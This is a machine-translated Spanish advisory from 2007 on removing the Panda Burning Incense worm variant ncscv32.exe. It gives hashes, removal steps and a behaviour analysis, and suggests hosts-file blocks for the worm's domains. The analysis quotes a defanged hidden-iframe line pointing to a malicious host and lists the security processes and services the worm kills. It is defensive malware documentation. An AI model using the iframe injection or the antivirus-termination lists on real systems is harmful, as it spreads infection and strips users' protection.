Mi máquina fue atacada por ncscv32.exe. ¿Cómo borrarlo?
Panda Burning Incense Nueva variante ncscv32.exe Solución 2007-02-01 20:36 Se recomienda configurar la configuración para prohibir el acceso a lovebak.com/krvkr.com/whboy.net Lanzamientos CISRT Panda Burning Incienso Nueva Variante ncscv32.exe Solución 2007-01-31 09:24CISRT lanza la solución para la nueva variante ncscv32.exe de Panda Burning Incense
Uso:
1. herramienta de eliminación para eliminar
2. Reinicie la computadora después de completar el proceso de eliminación
3. Utilice 360 Security Guard para eliminar archivos residuales
Dirección de descarga:
/killer_asn.exe
Número de archivo: CISRT2007023
Nombre del virus: Worm.Win32.Fujack.l (Kaspersky)
Virus alias: Worm.Nimaya.cf (Rising)
Worm.WhBoy.bx.68778 (tirano de la droga)
Tamaño del virus: 68,938 bytes
Método de empaquetado: FSG
MD5 de muestra: 0ae2056fa8c99331332fe3cd4e31342d
SHA1 de muestra: e02edb9c99055e00a3390638d0d7b02f9942dcb2
Tiempo de descubrimiento: 2007.1
Hora de actualización: 2007.1 .24
Virus asociados:
Método de propagación: páginas web maliciosas, descargas de otros virus, se pueden propagar a través de LAN
Análisis técnico
=== =======
La nueva variante de Panda Burning Incense es similar a la solución de la variante anterior CISRT2007017 Variante Panda Burning Incense que infecta la página web de modificación del archivo ncscv32.exe.
Después de ejecutar, cópiese al directorio del sistema y ejecute:
System\drivers\ncscv32.exe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Ejecutar ]
"nvscv32"="System\drivers\ncscv32.exe"
Modifique el registro para invalidar la configuración "Mostrar todos los archivos y carpetas":
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword: 00000000
Intenta cerrar la ventana de seguridad. ventana relacionada:
p>
Skynet
Firewall
VirusScan
Symantec AntiVirus
Seguridad del sistema Monitor
Ingeniero de reparación del sistema
Asesino de regalo envuelto
Maestro de detección de troyanos del juego
Super Patrol
Intenta finalizar los procesos relacionados con la seguridad, así como sus variantes anteriores, proceso del virus Viking:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
SREng.EXE
spoclsv.exe
nvscv32.exe
sppoolsv.exe
spo0lsv.exe
Eliminar servicios relacionados con la seguridad:
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP p>
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
p>
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
Eliminar inicio relacionado con la seguridad elementos:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows \ CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE \ Microsoft\Windows\CurrentVersion\Run\Network Associates Servicio de informes de errores
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
Omita los siguientes directorios para infectar archivos EXE/SCR/PIF/COM, pero no infecte setup.exe ni NTDETECT.COM :
C:\
C:\WINDOWS
C:\WINNT
C:\WINDOWS\system32
C:\WINNT\system32
C:\Documentos y configuraciones
C:\Información del volumen del sistema
C:\Recycled
Archivos de programa\Windows NT
Archivos de programa\WindowsUpdate
Archivos de programa\Windows Media Player
Archivos de programa\Outlook Express
Archivos de programa\Internet Explorer
Archivos de programa\NetMeeting
Archivos de programa\Archivos comunes
Archivos de programa\Aplicaciones ComPlus
Archivos de programa\Messenger
Información de instalación de ProgramFiles\InstallShield
ProgramFiles\Microsoft Frontpage
ProgramFiles\Movie Maker
ProgramFiles\MSN Gamin Zone
El método de infección de agruparse en la parte frontal del archivo infectado es similar a la variante anterior y agregar información de etiqueta al final: WHBOY {nombre del archivo original}.exe {tamaño en bytes del archivo original}
Modifique excepto el htm en el directorio anterior /html/asp/php/jsp/aspx archivo de página web, agregue el código iframe oculto al final del archivo: lt iframe src=hxxp://www.lovebak.com/qq; .htm width="0" height="0"gt ;lt;/iframegt;
El archivo Desktop__.ini quedará en el directorio atravesado por el virus y el contenido es la fecha actual
Utilice una contraseña débil para intentar copiarse con el nombre del archivo Games.exe Vaya a otras computadoras en la LAN
Ahora se muestra el lugar donde se dejaron originalmente los "caracteres de comunicación" de la siguiente manera:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
PD: enumera los tipos de ViKing y Panda
Tipos de ViKing: Logo1_.exe/Logo_1.exe/Rundl132.exe
Tipo de Nimuya: ncscv32.exe/spoclsv.exe/nvscv32.exe/sppoolsv.exe/spo0lsv .exe
Se recomienda configurar una prohibición de acceso al sitio lovebak.com/krvkr.com/whboy.net Panda Update Service
59.63.157.80
hxxp://www.lovebak.com Nuevo nombre de dominio registrado el 23 de enero de 2007
hxxp://www.krvkr .com es un nombre de dominio antiguo con muchas malas acciones
hxxp://www.whboy.net
El ejemplo es el siguiente:
drivers\etc\hosts
127.0.0.1 59.63.157.80
127.0.0.1 lovebak.com
127.0.0.1 krvkr.com
127.0.0.1 whboy.net